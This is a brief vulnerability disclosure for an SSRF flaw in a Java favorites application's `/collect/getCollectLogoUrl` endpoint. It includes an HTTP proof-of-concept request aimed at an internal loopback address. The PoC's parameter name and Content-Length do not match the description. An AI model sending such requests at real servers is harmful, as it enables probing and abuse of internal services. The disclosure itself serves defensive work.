### Key Information #### Vulnerability Type - SSRF (Server-Side Request Forgery) #### Affected Versions - <= v1.3.0 #### Vulnerability Description - An SSRF vulnerability was discovered on the `/collect/getCollectLogoUrl` endpoint. - The `targetUrl` parameter is user-controllable and lacks sufficient security validation during network requests, leading to the SSRF vulnerability. - Attackers can exploit this vulnerability to probe and abuse internal services of the target system. #### Vulnerable Code Locations - `app/src/main/java/com/favorites/web/CollectController.java` - `app/src/main/java/com/favorites/utils/HtmlUtil.java` #### POC (Proof of Concept) ```http POST /collect/getCollectLogoUrl HTTP/1.1 Host: 127.0.0.1:7080 Content-Type: application/json;charset=UTF-8 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.88 Safari/537.36 Connection: close Content-Length: 24 {"url":"http://127.0.0.1:88/"} ``` #### Impact - The SSRF vulnerability may allow attackers to access internal network resources, leading to data leakage, system compromise, and other severe consequences. - Reference: https://portswigger.net/web-security/ssrf/what-is-the-impact-of-ssrf-attacks